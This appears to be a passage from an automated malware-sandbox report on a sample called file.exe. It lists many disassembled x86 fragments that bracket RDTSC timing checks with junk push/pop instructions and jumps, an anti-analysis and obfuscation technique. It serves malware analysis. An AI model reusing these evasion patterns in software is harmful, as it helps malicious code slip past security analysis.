              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730C0E second address: 730C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E5h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730D9A second address: 730D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73159C second address: 7315A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7315A5 second address: 7315B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7315B6 second address: 7315BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7315BA second address: 7315CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F38751214ACh 0x0000000c jns 00007F38751214A6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73177D second address: 731781 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731781 second address: 731789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731789 second address: 7317AA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3874C2D1DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F3874C2D1DDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731D8C second address: 731D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731D91 second address: 731DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3874C2D1E0h 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731DAE second address: 731DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731DB9 second address: 731DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 731DC1 second address: 731DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704C5F second address: 704C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704C65 second address: 704C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704C6F second address: 704C79 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704C79 second address: 704C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F38751214A6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F38751214B2h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC2FB second address: 6FC316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3874C2D1E0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C1B9 second address: 73C1BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C1BD second address: 73C1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F000 second address: 73F01A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F01A second address: 73F020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F020 second address: 73F024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F024 second address: 73F04F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 5E737040h 0x0000000f mov edi, dword ptr [ebp+122D3932h] 0x00000015 jng 00007F3874C2D1D7h 0x0000001b stc 0x0000001c call 00007F3874C2D1D9h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pop edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F04F second address: 73F059 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F059 second address: 73F063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F063 second address: 73F085 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e je 00007F38751214ACh 0x00000014 jng 00007F38751214A6h 0x0000001a jnc 00007F38751214ACh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F085 second address: 73F0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jp 00007F3874C2D1DEh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3874C2D1E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F0B6 second address: 73F0CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F38751214ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F0CF second address: 73F0DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3874C2D1D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F436 second address: 73F43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCE8 second address: 73FCF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FD8B second address: 73FD90 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FD90 second address: 73FDD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ecx 0x0000000d jl 00007F3874C2D1DCh 0x00000013 jp 00007F3874C2D1D6h 0x00000019 popad 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D252Ch], ebx 0x00000022 pushad 0x00000023 sbb al, FFFFFFB0h 0x00000026 mov dword ptr [ebp+122D1AF4h], eax 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F3874C2D1DDh 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDD0 second address: 73FDDA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDDA second address: 73FDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FDE0 second address: 73FDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FE8F second address: 73FE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FE93 second address: 73FEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7403BF second address: 7403C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7403C4 second address: 7403CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408FF second address: 74091F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3874C2D1E3h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74091F second address: 74092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7411DF second address: 7411F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3874C2D1D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jc 00007F3874C2D1DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742261 second address: 742265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A50 second address: 741A67 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F3874C2D1D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742265 second address: 74226B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A67 second address: 741A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74226B second address: 742270 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741A6C second address: 741A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742BEE second address: 742C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F38751214B8h 0x00000011 jmp 00007F38751214B2h 0x00000016 nop 0x00000017 mov esi, ebx 0x00000019 mov esi, dword ptr [ebp+122D19DEh] 0x0000001f push 00000000h 0x00000021 mov esi, dword ptr [ebp+122D3597h] 0x00000027 push 00000000h 0x00000029 add dword ptr [ebp+122D306Ch], edx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push edi 0x00000035 pop edi 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C43 second address: 742C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C47 second address: 742C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742C4D second address: 742C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7450A5 second address: 7450BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 748149 second address: 748153 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3874C2D1DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A711 second address: 74A790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F38751214B7h 0x0000000e jmp 00007F38751214B1h 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F38751214A8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f cmc 0x00000030 mov ebx, ecx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D197Bh], eax 0x0000003a push 00000000h 0x0000003c xchg eax, esi 0x0000003d jg 00007F38751214C5h 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 pushad 0x00000047 popad 0x00000048 push edx 0x00000049 pop edx 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7434B2 second address: 7434B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7434B6 second address: 7434C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214AEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C6F0 second address: 74C712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C712 second address: 74C71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C71A second address: 74C769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F3874C2D1D8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov bx, 3D34h 0x00000025 push 00000000h 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c mov edi, esi 0x0000002e mov dword ptr [ebp+124734F4h], esi 0x00000034 xchg eax, esi 0x00000035 jmp 00007F3874C2D1DFh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edi 0x00000040 pop edi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C769 second address: 74C76F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E765 second address: 74E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74E76B second address: 74E77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F38751214A8h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDDB second address: 74EDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EDDF second address: 74EE6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jno 00007F38751214B4h 0x00000012 nop 0x00000013 mov ebx, dword ptr [ebp+1244FF67h] 0x00000019 push 00000000h 0x0000001b mov ebx, esi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007F38751214A8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 ja 00007F38751214A8h 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 push esi 0x00000042 jnc 00007F38751214A6h 0x00000048 pop esi 0x00000049 jmp 00007F38751214B7h 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F38751214ADh 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE6D second address: 74EE71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74EE71 second address: 74EE77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750F69 second address: 750FD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F3874C2D1E6h 0x0000000e mov dword ptr [ebp+122D1B7Ah], edx 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007F3874C2D1D8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 jmp 00007F3874C2D1E2h 0x00000036 or ebx, dword ptr [ebp+1244FF6Ch] 0x0000003c push 00000000h 0x0000003e xor edi, dword ptr [ebp+12467165h] 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push edx 0x0000004a pop edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750FD8 second address: 750FE2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7540EC second address: 7540F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7561CE second address: 7561D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7561D2 second address: 75622B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3874C2D1DCh 0x0000000c jl 00007F3874C2D1D6h 0x00000012 popad 0x00000013 nop 0x00000014 mov di, cx 0x00000017 mov dword ptr [ebp+122D1B02h], ebx 0x0000001d push 00000000h 0x0000001f or di, EFE5h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F3874C2D1D8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 adc edi, 0BE6184Bh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jnl 00007F3874C2D1D8h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75825F second address: 758263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758263 second address: 758269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 758269 second address: 7582EF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F38751214A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F38751214BAh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F38751214A8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c or bl, 0000006Ch 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+124501E2h], eax 0x00000037 call 00007F38751214AAh 0x0000003c adc bx, 3306h 0x00000041 pop ebx 0x00000042 push 00000000h 0x00000044 mov bx, cx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jng 00007F38751214B6h 0x00000050 jmp 00007F38751214B0h 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7591B1 second address: 75922F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c jmp 00007F3874C2D1DEh 0x00000011 pop edx 0x00000012 jmp 00007F3874C2D1E2h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F3874C2D1D8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 jnc 00007F3874C2D1D9h 0x0000003b push 00000000h 0x0000003d je 00007F3874C2D1DCh 0x00000043 mov dword ptr [ebp+122D3468h], eax 0x00000049 xchg eax, esi 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F3874C2D1DBh 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75922F second address: 75924F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F38751214B4h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A142 second address: 75A147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762BFA second address: 762C05 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jbe 00007F38751214A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
